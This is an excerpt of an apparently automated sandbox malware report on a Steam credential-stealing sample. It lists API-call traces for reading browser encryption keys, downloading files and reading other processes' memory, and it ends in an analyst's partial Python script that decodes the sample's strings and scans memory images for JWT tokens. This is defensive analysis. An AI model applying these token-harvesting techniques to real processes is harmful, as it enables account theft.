                                      • Instruction Fuzzy Hash: 8B514675910208AFDB14EFB4DC89EFE77BCEF59751F004519F905D2250EB30A9498BA0
                                      APIs
                                      • memset.MSVCRT ref: 00302C89
                                      • memset.MSVCRT ref: 00302C9C
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                      • lstrcat.KERNEL32(?,00000000), ref: 00302CCC
                                      • lstrcat.KERNEL32(?,02F45420), ref: 00302CE8
                                      • lstrcat.KERNEL32(?,?), ref: 00302CFC
                                      • lstrcat.KERNEL32(?,02F450D8), ref: 00302D10
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 002FBE30: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002FBE7D
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 00301000: GlobalAlloc.KERNEL32(00000000,?), ref: 0030100B
                                      • StrStrA.SHLWAPI(00000000,02F45438), ref: 00302DA5
                                      • GlobalFree.KERNEL32(00000000), ref: 00302E74
                                        • Part of subcall function 002F6CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6CF7
                                        • Part of subcall function 002F6CD0: LocalAlloc.KERNEL32(00000040,00000000,?,002F5AF2,00000000,?,?), ref: 002F6D06
                                        • Part of subcall function 002F6CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6D1D
                                        • Part of subcall function 002F6CD0: LocalFree.KERNEL32(?,?,002F5AF2,00000000,?,?), ref: 002F6D2C
                                        • Part of subcall function 002F6E90: memset.MSVCRT ref: 002F6EE7
                                        • Part of subcall function 002F6E90: LocalAlloc.KERNEL32(00000040,?), ref: 002F6F1E
                                      • lstrcat.KERNEL32(?,00000000), ref: 00302E1B
                                      • StrCmpCA.SHLWAPI(?,003101E9,?,?,?,?,000003E8), ref: 00302E35
                                      • lstrcat.KERNEL32(00000000,?), ref: 00302E50
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 00302E5C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3732263607-0
                                      • Opcode ID: e2a533184a77745b38d92381104c80319e774bcec615344ba7010661de74f1c8
                                      • Instruction ID: 55be5c1c6136b44cb12cca8260b4787b49beaf884005ef713272a0e96700d931
                                      • Opcode Fuzzy Hash: e2a533184a77745b38d92381104c80319e774bcec615344ba7010661de74f1c8
                                      • Instruction Fuzzy Hash: 246195B191120CABDB15EBA0CC99FEF777CAF54740F044568FA05A7181EB30A659CFA0
                                      APIs
                                      • memset.MSVCRT ref: 0030110A
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                      • wsprintfW.USER32 ref: 00301153
                                      • OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                      • CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID: %hs${r/${r/
                                      • API String ID: 3729781310-3226881146
                                      • Opcode ID: 7178b9f2a9b65ab675cc54f7415b8e201d90476129be1b9f802358576829c9b0
                                      • Instruction ID: d2f656d3e5c8dad3549f6151f96de3946a6286b4ec0c4556b1acb5122f60bb0a
                                      • Opcode Fuzzy Hash: 7178b9f2a9b65ab675cc54f7415b8e201d90476129be1b9f802358576829c9b0
                                      • Instruction Fuzzy Hash: 6A319371A01208BBEB25DBE0DC99FEE777CEF49740F104155FA05E61C0DB70AA458BA5
                                      APIs
                                      • GetFileInformationByHandle.KERNEL32(?,?,?), ref: 00309D9F
                                      • GetFileSize.KERNEL32(?,00000000,?,?), ref: 00309E15
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00309E34
                                      • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00309E49
                                      • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00309E52
                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00309E61
                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00309E7F
                                      • ReadFile.KERNEL32(?,0030A367,00000004,?,00000000), ref: 00309E8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$PointerRead$HandleInformationSize
                                      • String ID:
                                      • API String ID: 2979504256-0
                                      • Opcode ID: f9f3305b62d8938ee285346d2919e37f29fe0c0c47e81a210a531a9ca342616c
                                      • Instruction ID: 3a80b495fe7da1e9f23044267c3f746d9cfe0b342e97f353e9841dbafd9dc7d4
                                      • Opcode Fuzzy Hash: f9f3305b62d8938ee285346d2919e37f29fe0c0c47e81a210a531a9ca342616c
                                      • Instruction Fuzzy Hash: 5351B471E02208ABEB25DF65CC91FAEB7B9EF84700F15851AE501A72C1D770AE41C794
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F4ED3
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F4EEE
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 002F4F13
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002F4F36
                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002F4F4F
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002F4F76
                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002F4FA0
                                      • CloseHandle.KERNEL32(00000000,?,00000400), ref: 002F4FBC
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4FC3
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4FCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 105467990-0
                                      • Opcode ID: 41e117c68b2dad2da629fef4f2bbc3f9bf464b9fb5fc9836ff9d53c3f57d4b53
                                      • Instruction ID: ae82f431f1ee8c8bffeb2123f420f4c66ecdf9a0511c10db30f89ba580c0a9be
                                      • Opcode Fuzzy Hash: 41e117c68b2dad2da629fef4f2bbc3f9bf464b9fb5fc9836ff9d53c3f57d4b53
                                      • Instruction Fuzzy Hash: F1416D71620209ABEB20EF70DD5AFBE736CEF54740F544128FB05A6191DB70AA19CB64
                                      APIs
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 0030571C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305736
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305774
                                      • lstrcat.KERNEL32(?,02F43188), ref: 00305788
                                      • lstrcat.KERNEL32(?,?), ref: 0030579C
                                      • lstrcat.KERNEL32(?,?), ref: 003057AA
                                      • lstrcat.KERNEL32(?,003101E0), ref: 003057BC
                                      • lstrcat.KERNEL32(?,?), ref: 003057D0
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00305863
                                      • FindClose.KERNEL32(00000000), ref: 00305872
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                      • String ID:
                                      • API String ID: 1847592606-0
                                      • Opcode ID: ce5e328944fafa080d46d2d4d5c490c905b41cdc004ddfce74bef7dfa52ec54f
                                      • Instruction ID: 35eac716c535c4e78befcd9778ff9a30f1fab540335749520179ea1849bdf38f
                                      • Opcode Fuzzy Hash: ce5e328944fafa080d46d2d4d5c490c905b41cdc004ddfce74bef7dfa52ec54f
                                      • Instruction Fuzzy Hash: 5A41BB7552120CABDB29EFA0DD99EFE733CAF54740F0485A8FA0592081EB709749CF61
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 002FF561
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 002FF588
                                      • memset.MSVCRT ref: 002FF5E4
                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 002FF63C
                                      • memset.MSVCRT ref: 002FF6CF
                                      Strings
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002FF5FA, 002FF6E8
                                      • N0ZWFt, xrefs: 002FF692
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                       • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Processmemset$MemoryOpenRead
                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                      • API String ID: 2048220554-1622206642
                                      • Opcode ID: f17f3f8c5b554925d222f5329579b540a3303fc8f9fa1dbaceb317b427c7f111
                                      • Instruction ID: 121d36775220963627cea9247135e6d7eeb509a557b2a20cc222ef49b544435d
                                      • Opcode Fuzzy Hash: f17f3f8c5b554925d222f5329579b540a3303fc8f9fa1dbaceb317b427c7f111
                                      • Instruction Fuzzy Hash: 17613671D10209ABEB34AFA4CC45BEFF7B99F44350F044278F618A72D1EBB499548BA1
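Added analyst note and example, not part of the Joe Sandbox report or of the sample's code: the function above opens a process with PROCESS_ALL_ACCESS (0x001FFFFF) and reads it with ReadProcessMemory in 0x208-byte requests. The hex string in its Strings list decodes to the ASCII text eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0, which is the base64 form of the JWT header { "typ": "JWT", "alg": "EdDSA" }, and N0ZWFt is how the word "steam" appears in base64 when it starts at the second byte of a 3-byte group, which fits the Trojan.PWS.Steam naming of the sample. The Python below, written for this page, decodes both strings and shows how an analyst can search a memory image for tokens carrying that header, including the case where a token straddles two 0x208-byte reads. The sample token, its claims, and the 64 placeholder signature bytes are constructed; nothing here touches a live process.

```python
import base64
import json
import re

# The two strings exactly as printed in this function's "Strings" list (report data).
HEX_STRING = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
              "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")
FRAGMENT = "N0ZWFt"
READ_SIZE = 0x208  # nSize passed to ReadProcessMemory in the call listed above


def decode_hex_string(hex_string: str) -> str:
    """The hex bytes are plain ASCII: the base64 form of a JWT header."""
    return bytes.fromhex(hex_string.replace(" ", "")).decode("ascii")


def decode_b64_segment(segment: str) -> bytes:
    """Decode one JWT segment (URL-safe base64 with the padding stripped)."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def base64_contains_fragment(fragment: str, word: bytes) -> bool:
    """True if `fragment` occurs in base64(word) at one of the three 3-byte alignments.
    Base64 maps 3 bytes to 4 characters, so the same word looks different depending
    on where it starts in the encoded input; a scanner that only knows one form misses
    the other two."""
    return any(fragment in base64.b64encode(b"\x00" * offset + word).decode("ascii")
               for offset in range(3))


JWT_HEADER_B64 = decode_hex_string(HEX_STRING)
# header '.' payload '.' signature, all in the URL-safe base64 alphabet without padding
JWT_RE = re.compile(re.escape(JWT_HEADER_B64.encode("ascii"))
                    + rb"\.([A-Za-z0-9_-]+)\.([A-Za-z0-9_-]+)")


def parse_token(token: bytes) -> dict:
    """Split a matched token and decode its header and payload (signature is not verified)."""
    header_b64, payload_b64, sig_b64 = token.decode("ascii").split(".")
    return {
        "token": token.decode("ascii"),
        "header": json.loads(decode_b64_segment(header_b64)),
        "payload": json.loads(decode_b64_segment(payload_b64)),
        "signature_len": len(decode_b64_segment(sig_b64)),
    }


def find_tokens(buffer: bytes) -> list:
    """Scan a contiguous memory image for JWTs carrying the EdDSA header."""
    return [parse_token(m.group(0)) for m in JWT_RE.finditer(buffer)]


def find_tokens_chunked(buffer: bytes, chunk_size: int = READ_SIZE, max_token_len: int = 4096) -> list:
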